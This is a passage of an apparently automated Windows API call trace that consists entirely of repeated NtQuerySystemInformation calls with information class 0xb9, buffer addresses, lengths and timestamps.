NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0206.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x28, ResultLength=0x0) [0206.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x28, ResultLength=0x0) [0206.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0206.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x20, ResultLength=0x0) [0206.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0206.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0206.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0206.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0206.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x20, ResultLength=0x0) [0206.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x20, ResultLength=0x0) [0206.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x20, ResultLength=0x0) [0206.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e8, Length=0x58, ResultLength=0x0) [0206.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0206.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0206.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0206.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0206.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0206.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x28, ResultLength=0x0) [0206.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0206.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0206.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcff0, Length=0x28, ResultLength=0x0) [0206.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcff0, Length=0x28, ResultLength=0x0) [0206.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0206.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0206.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce60, Length=0x20, ResultLength=0x0) [0206.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x20, ResultLength=0x0) [0206.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x20, ResultLength=0x0) [0206.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x20, ResultLength=0x0) [0206.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x20, ResultLength=0x0) [0206.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0206.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x20, ResultLength=0x0) [0206.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0206.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0206.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0206.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0206.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x20, ResultLength=0x0) [0206.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0206.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0206.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0206.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0206.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x20, ResultLength=0x0) [0206.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0206.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0206.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e8, Length=0x58, ResultLength=0x0) [0206.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x58, ResultLength=0x0) [0206.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0206.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0206.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0206.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0206.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0206.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce70, Length=0x28, ResultLength=0x0) [0206.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0206.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0206.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0206.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0206.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x20, ResultLength=0x0) [0206.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0206.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0206.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0206.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0206.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x20, ResultLength=0x0) [0206.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x20, ResultLength=0x0) [0206.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x20, ResultLength=0x0) [0206.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x58, ResultLength=0x0) [0206.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0206.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0206.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0206.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0206.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0206.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce70, Length=0x28, ResultLength=0x0) [0206.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0206.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0206.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0206.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0206.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd10, Length=0x20, ResultLength=0x0) [0206.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd10, Length=0x20, ResultLength=0x0) [0206.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd10, Length=0x20, ResultLength=0x0) [0206.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0206.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0206.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x20, ResultLength=0x0) [0206.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x20, ResultLength=0x0) [0206.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x20, ResultLength=0x0) [0206.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x58, ResultLength=0x0) [0206.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0206.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0206.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0206.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.660] NtQuerySystemInformation 